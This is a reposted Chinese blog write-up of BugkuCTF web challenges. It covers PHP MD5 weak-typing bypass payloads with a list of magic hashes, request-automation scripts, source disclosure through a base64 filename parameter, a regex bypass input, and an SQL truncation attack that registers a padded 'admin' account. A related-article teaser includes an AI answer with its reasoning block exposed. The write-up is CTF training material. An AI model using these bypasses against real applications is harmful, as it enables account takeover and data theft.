BugkuCTF

最新推荐文章于 2024-08-03 16:17:07 发布
转载 最新推荐文章于 2024-08-03 16:17:07 发布 · 166 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/pangya/p/10214564.html
文章标签:

#php #数据库 #开发工具

本文深入探讨了多种渗透测试技巧,包括利用PHP弱点获取flag、快速数学计算、Cookie欺骗、SQL约束攻击等,提供了实战代码与解析。

1.听说备份是个好习惯

访问时,有一串md5

d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e

解密说是空密码。

然后进行目录扫描,发现源码泄露。

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."获取flag";
}
?>
1. $str=str_replace('key','',$str) //replace替换  key会替换成空。使用kekeyy绕过
2. md5($key1)==md5($key2)       //key1 和key2的md5值要相同
3.  $key1!==$key2                  //key1和key2值要不相同

第一种

md5()函数无法处理数组,如果传入的为数组,会返回NULL

payload :http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=a

第二种

php弱类型绕过构造提交的值md5(),开头为0e

payload:http://123.206.87.240:8002/web16/?kkeyey1=s878926199a&kkeyey2=s155964671a

提供常用的php弱类型

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020<

 2.秋名山老司机(快速计算)

直接帖代码

import requests
import re
url='http://123.206.87.240:8002/qiumingshan/'
s=requests.Session()
r=s.get(url)
num=re.findall(r'<div>(.*)=',r.text)[0]
result=eval(num)
r=s.post(url,data={'value':result})
r.encoding='utf-8'
print (r.text)

 3.我感觉你的快点

查看源代码,让以post方法去访问。

查看数据包,看到有一个flag字段。base64去解码,发现是一串数字,然后使用给的参数加数字,使用post去访问。

直接上代码

import requests
import base64
import re

url = 'http://123.206.87.240:8002/web6/'
e=requests.Session()                                    //获取session。
s=e.get(url)                                                 //以get方式去请求
html=s.headers['flag']                                  //获取返回数据包中flag字段
q=base64.b64decode(base64.b64decode(html)[-8:])  
//第一次把flag中的字段进行base64解码,然后取解码后的后8位进行第二次base64解码
data={'margin':q}                                   //获取margin这个参数,
c=e.post(url,data = data)                        //使用post去请求
print(c.text)                                            //返回信息

 4.cookie欺骗

url:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ=  发现后面为base64。进行解码 为 key.txt  

然后把这个进行更换,为index.php  (开始尝试了flag.txt,没有东西) 发现有东西,然后修改line 这个参数,发现每更换一个数字就会返回不一样的结果。

利用脚本

import requests
for i in range(10):
    url='http://123.206.87.240:8002/web11/index.php?line={0}&filename=aW5kZXgucGhw'.format(i)
    r=requests.get(url)
    print (r.text)

获得代码

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>


 发现还有 cookie: margin=margin   && 访问keys.php  即可。


5.字符?正则?


打开网页发现有一串PHP




 <?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?> 




进行分析一下,通过 id 传参,并且要符合上面的正则表达式,key就会显示。




highlight_file  对文件进行语法高亮显示。
preg_match (要搜索的模式,字符串,参数) 在字符串里搜索符合 要搜索的模式 的字符,并返回给参数。




分析正则




.                                  匹配除 "\n" 之外的任何单个字符
.*                     就是单个字符匹配任意次,即贪婪匹配
{4,7}                              最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 47 个任意字符
\/                                 匹配 / ,这里的 \ 是为了转义
[a-z]                              匹配所有小写字母
[:punct:]                          匹配任何标点符号
/i                                 表示不分大小写




由上构造payload。




?id=keykey1111key:/a/keya:




,得flag。




 <?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

key is: KEY{0x0SIOPh550afc}




 6.Login1(SKCTF)


题目提示:SQL约束攻击。(一脸懵逼,没见过。~~)


SQL约束攻击:




在sql执行字符串处理的时候,字符串末尾的空格符都会被删除,以下两个字符串结果相等,在数据库对字符串进行比较时,如果两个字符串的长度不一样,则会将较短的字符串末尾填充空格,使两个字符串的长度一致.


SELECT * FROM users WHERE username='test   '; 
SELECT * FROM users WHERE username='test';

INSERT截断:这是数据库的另一个特性,当设计一个字段时,我们都必须对其设定一个最大长度,比如CHAR(10),VARCHAR(20)等等。但是当实际插入数据的长度超过限制时,数据库就会将其进行截断,只保留限定的长度。
说明注册'test'用户 和 'test    '用户,由于截断,所有这个两个用户是一样的。
当不知道test用户密码的时候,我们可以创建一个'test   '用户 密码‘123456’。在查询的时候会执行下面这条
SELECT username FROM users WHERE username='test' AND password='123456'




这里注册一个'admin     ',密码任意的账号。登录进去后显示flag。


转载于:https://www.cnblogs.com/pangya/p/10214564.html

                

        




    

    
  



    

      

        

            

              
                
                  335046781
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
WEB CTF入门题解析

				
			

			

				

					攻防人生3722的博客
				

				

					07-30
					
					8252
					
				

			

		

		

			
				
WEB CTF入门学习

入门题1 view_source
X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。
	答案:cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67}
	解析:打开网址http://220.249.52.133:31520/,F12调试模式,查看源码,即可发现flag: cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67}
	入门题2 get_post
	题目描述:X老师告诉小宁同学HTTP

			
		

	



                

            
              



	

		

			

				
					
BugkuCTF Web篇

				
			

			

				

					2201_75891821的博客
				

				

					07-30
					
					2123
					
				

			

		

		

			
				
Bug ku CTF web篇

			
		

	



              


  
              

                


	

		

			

				
					
BugKuCTF-杂项-writeup 大全?

				
			

			

				

					疯狂棒棒糖的博客
				

				

					06-20
					
					1万+
					
				

			

		

		

			
				
最近玩了一个 CTF 的练习平台-----BugkuCTF下面会把一些题目的方法记录下来先讲一下杂项1.签到题只要关注公众号就可以得到 flag---开胃菜2.这是一张单纯的图片网站上打开是无法加载,将图片保存到本地是个小兔子,然后用编辑器打开图片,发现了最下面一行的 unicode 编码,解密就有 flag...

			
		

	





	

		

			

				
					
https://cgctf.nuptsast.com/-web-这题不是web

				
			

			

				

					a3uRa的一个窝
				

				

					10-13
					
					530
					
				

			

		

		

			
				
下载图片 后
记事本打开



			
		

	



		

			
		



	

		

			

				
					
Bugku 代码审计 wp

				
			

			

				

					天跃
				

				

					08-13
					
					593
					
				

			

		

		

			
				
小白的总结,如有写错还请大佬们多指点,谢谢了!

代码审计:

1.extract变量覆盖


&lt;?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
ec...

			
		

	





	

		

			

				
					
BugkuCTF web5

				
			

			

				

					weixin_30950887的博客
				

				

					06-04
					
					121
					
				

			

		

		

			
				
http://120.24.86.145:8002/web5/
打开网址

查看源代码


将()的内容复制到 Console,获得flag



转载于:https://www.cnblogs.com/CMlhc/p/9133624.html

			
		

	





	

		

			

				
					
bugku ctf misc wp2.pdf

				
			

			

				

					07-05
				

			

		

		

			
				
bugku ctf misc wp2.pdf

			
		

	





	

		

			

				
					
【CTF WEB基础】POST-Bugku CTF题解及知识点

				
			

			

				

					yu_fly_fish的博客
				

				

					08-03
					
					729
					
				

			

		

		

			
				
一起变强!

			
		

	





	

		

			

				
					
BugkuCTF练习题解——Web一

				
			

			

				

					qq_41739275的博客
				

				

					08-24
					
					7116
					
				

			

		

		

			
				
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯
1.Web2
打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的

感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅

注释部分就是flag了。
2.

			
		

	





	

		

			

				
					
Bugku CTF梳理

				
			

			

				

					lin的博客
				

				

					04-10
					
					1551
					
				

			

		

		

			
				
大佬的刷题记录:https://blog.youkuaiyun.com/mcmuyanga

1.CTF常见题型
CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。


MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。


PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。


CRYPTO(Cryptography)

			
		

	





	

		

			

				
					
bugkuctf——web基础_$POST

				
			

			

				

					weixin_40980428的博客
				

				

					03-30
					
					1625
					
				

			

		

		

			
				
发现是post传参,复制网址使用在线http接口测试,输入URL,然后输入参数名:what,参数值flag,即可得出flag

			
		

	





	

		

			

				
					
bugku 本地包含 writeup

				
			

			

				

					xuchen16的博客
				

				

					09-17
					
					3万+
					
				

			

		

		

			
				
转载自:https://blog.youkuaiyun.com/Sanky0u/article/details/77197523

本地包含

右键查看源代码  
搜了一下@$_REQUEST 的意思是获得参数,不论是@$_GET还是@$_POST可以得到的参数@$_REQUEST都能得到。 
所以构造hello的get参数。 
$a应该最后会像字符串替换一样替换成hello的参数值吧。


&lt;1&gt...

			
		

	





	

		

			

				
					
中北大学第二届CTF的WEB模块第一题

				
			

			

				

					panda的博客
				

				

					06-07
					
					770
					
				

			

		

		

			
				
中北大学第二届CTF的WEB模块第一题
题目代码
<?php
    include_once 'flag.php';
    highlight_file(__FILE__);
    // Security filtering function
    function filter($str){
        return str_replace('secure', 'secured', $str);
    }
    class Hacker{
        public $userna

			
		

	





	

		

			

				
					
PHP 函数漏洞总结

					
热门推荐

				
			

			

				

					4ct10n
				

				

					03-09
					
					4万+
					
				

			

		

		

			
				
总结了常见的PHP函数漏洞,希望对大家有用

			
		

	





	

		

			

				
					
Bugku Misc 签到题

				
			

			

				

					我,我的博客
				

				

					08-07
					
					2244
					
				

			

		

		

			
				
文件为微信二维码,扫描关注公众号,即得 


flag{BugKu-Sec-pwn!}

20 Points Get!

			
		

	





	

		

			

				
					
听说备份是个好习惯(CTF-练习平台)

				
			

			

				

					EustiaSora的博客
				

				

					01-24
					
					8076
					
				

			

		

		

			
				
这个应该也是新题,网上没找到wp,自己写一份
题目地址:http://120.24.86.145:8002/web16/
提示提到了备份,应该是备份文件源码泄漏一类的,从这里入手,使用 @王一航 dalao的脚本爆得:

脚本来源:
https://git.coding.net/yihangwang/SourceLeakHacker.git

从第二个地址下载获得源码:


分

			
		

	





	

		

			

				
					
CTF之PHP代码审计2

				
			

			

				

					bmth666的博客
				

				

					03-11
					
					1931
					
				

			

		

		

			
				
ctf之php代码审计,从入门到入土!!!
变量覆盖之:extract函数的漏洞,$$的漏洞,parse_str的漏洞
通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞
由于php中可以使用$$声明变量,因此当在遍历数组时可能会覆盖原来的值
全局变量的问题:bugku之变量1
空白符的问题

			
		

	





	

		

			

				
					
BugKu 备份是个好习惯(扫描以及PHP弱类型中MD5绕过)

				
			

			

				

					weixin_45871855的博客
				

				

					04-07
					
					429
					
				

			

		

		

			
				
——题记——
这个题重要考察都PHP代码的理解以及PHP弱类型中MD5绕过题型的考察

PHP弱类型
string(字符串)
integer(整数)
array(数组)
double(浮点数)
boolean(布尔)
object
resource
NULL
题型1 strcmp 比较字符串大小
题型2 MD5绕过
方法1 科学计数法绕过 md5(‘QNKXDZO’)==md5(‘24061070...

			
		

	





	

		

			

				
					
云演CTF: 004.intval

				
			

			

				

					wanguixiu的博客
				

				

					06-09
					
					1123
					
				

			

		

		

			
				
云演CTF: 004.intval
        
            作者: admin
            时间: 2021-05-27
            分类: 云演CTF
        
        
            进去直接给了代码<?php
if(!isset($_GET['source'])){
    highlight_file('index.php');
    die();
}
include('flag.php');
$key1 ...

			
		

	





	

		

			

				
					
bugku CTF计算器

					
最新发布

				
			

			

				

					03-25
				

			

		

		

			
				
<think>好的,我现在需要回答用户关于Bugku CTF中的“计算器”题目的问题。首先,用户提到的是寻找相关的工具、题目和解题方法。根据用户提供的引用内容,我需要整合这些信息,确保符合系统级指令的要求,比如正确使用LaTeX格式,结构清晰,并生成相关问题。

首先,我需要回顾用户提供的引用内容。引用1、3、5都提到了“计算器”题目,其中关键点是输入答案时被限制只能输入一位数,解决方法是通过修改HTML中的maxlength属性。引用5还提到可能需要查看JS文件,但根据其他引用,可能不需要这一步,直接修改maxlength即可。引用2和4虽然涉及BugkuCTF的Web题,但可能不直接相关,但可以辅助说明解题思路。

接下来,我需要组织解题步骤。根据引用1、3、5,解题步骤大致是:查看页面发现输入限制,检查源码找到maxlength属性,修改该属性值,输入正确答案,得到flag。需要注意使用中文,正确应用行内公式,例如计算题可能涉及数学表达式,比如$3+5*2$,但用户提供的引用中没有具体题目内容,所以可能需要泛泛而谈。

然后,生成相关问题。根据用户示例,问题应围绕题目的关键点,比如如何绕过输入限制、其他类似题目、常见漏洞类型等。

需要确保回答中引用的段落末尾添加引用标识,比如[^1]、[^3]、[^5]。同时,检查LaTeX是否正确,比如变量用$包裹,独立公式用$$,但当前问题中可能没有复杂的数学公式,所以可能不需要独立公式。

最后,结构要清晰,分步骤说明解题方法,并确保回答真实可靠,引用正确来源。</think>### Bugku CTF 计算器题目解析
该题目是Bugku CTF平台上的Web基础题,要求通过修改前端限制获取flag。以下是具体解题方法:

#### 解题步骤
1. **观察题目限制**  
   题目页面显示一个数学计算题(例如$3+5*2$),但输入框仅允许输入1位数字。根据引用,输入答案时发现无法提交正确结果(如答案为13时需输入两位数)。

2. **查看网页源码**  
   右键检查页面元素,查找输入框对应的HTML代码,会发现类似语句:  
   ```html
   <input type="text" maxlength="1">
   ```  
   其中`maxlength="1"`限制了输入长度。

3. **修改输入限制**  
   将`maxlength`属性值从1改为3(或直接删除该属性),例如:  
   ```html
   <input type="text" maxlength="3">
   ```  
   修改后即可输入多位数字。

4. **提交正确答案**  
   输入计算结果(如116或13),系统验证通过后返回flag(如`flag{CTF-bugku-0032}`)。

#### 技术原理
该题目考察对前端验证的绕过能力。通过修改客户端HTML属性,绕过输入限制,属于Web安全中“客户端控制”漏洞的典型场景[^4]。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值